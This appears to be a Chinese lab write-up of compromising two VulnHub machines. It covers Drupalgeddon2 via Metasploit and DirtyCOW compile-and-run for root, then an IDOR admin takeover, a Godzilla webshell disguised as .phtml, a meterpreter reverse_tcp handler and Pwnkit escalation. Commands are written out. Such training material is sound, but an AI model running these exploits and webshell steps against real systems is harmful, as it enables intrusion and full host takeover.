run post/multi/recon/local_exploit_suggester

https://github.com/diego-treitos/linux-smart-enumeration

我们把.sh文件上传到/usr/share 下

然后我们扫描一下我们的靶机

https://www.vulnhub.com/entry/lampiao-1,249/
靶机下载地址

信息收集扫描ip扫描

访问80端口发现没有信息访问1898

看到这个外星人图标就知道是内网渗透中经常出现的Drupal

这个最常见的利用就是框架漏洞

发现是低版本的php搭建的 所以直接进行利用

这里我直接使用第二个exp

使用use进行调用

查看利用的配置  

检查一下payload

设置上  rhost和rport

 

报这个标头就是进入了 后渗透模式  就是我们已经控制了对方的主机

查看用户权限

找好定位我们现在是在web权限上

输入shell获取对方的命令行

查看id是1000内的所以我们的目标是拿取root权限

需要使用漏洞 先上传检测文件

报了小脏牛漏洞  直接去github上找 nomi-sec/PoC-in-GitHub: 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.

利用的exp

exp上传  

上传之后把exp.c进行编译

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

python -c 'import pty; pty.spawn("/bin/bash")'

复现环境：https://www.vulnhub.com/entry/lampiao-1,249/
1、信息收集：
nmap -p1-65535 192.168.139.0/24
2、Web漏洞利用：
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.46.144
set rport 1898
run
3、内核提权：
upload /root/linux-exploit-suggester.sh /tmp/1.sh
shell
cd /tmp
chmod +x 1.sh
./1.sh
https://github.com/gbonacini/CVE-2016-5195
upload /root/dcow.cpp /tmp/dcow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
su root

案例二  pwnkit  

靶机下载https://www.vulnhub.com/entry/darkhole-1,724/

sudo arp-scan -l

先扫描内网的ip

开放了80 

这个漏洞是前端的一个逻辑越权漏洞 先注册一个账号

账号修改里出现这个id可能就是 代表的账户 

我们试一下改为1会不会直接修改admin的账号和密码

哥斯拉生成后门 使用绕过形式 改为 .phtml 进行绕过

后门上传成功

后门地点

http://192.168.248.136/upload/xxx.phtml

学个新操做   哥斯拉联动msf（在不使用msfvemon生成反弹shell的情况下）

命令：

71  use /exploits/multi/handler
72  ip a
73  set payload php/meterpreter/reverse_tcp
74  set lport 5566
75  history

先加载再go

接受到了shell   然后进行提权

上传检测脚本

这个就是我们要学的新漏洞

第一个方法就是使用本地漏扫工具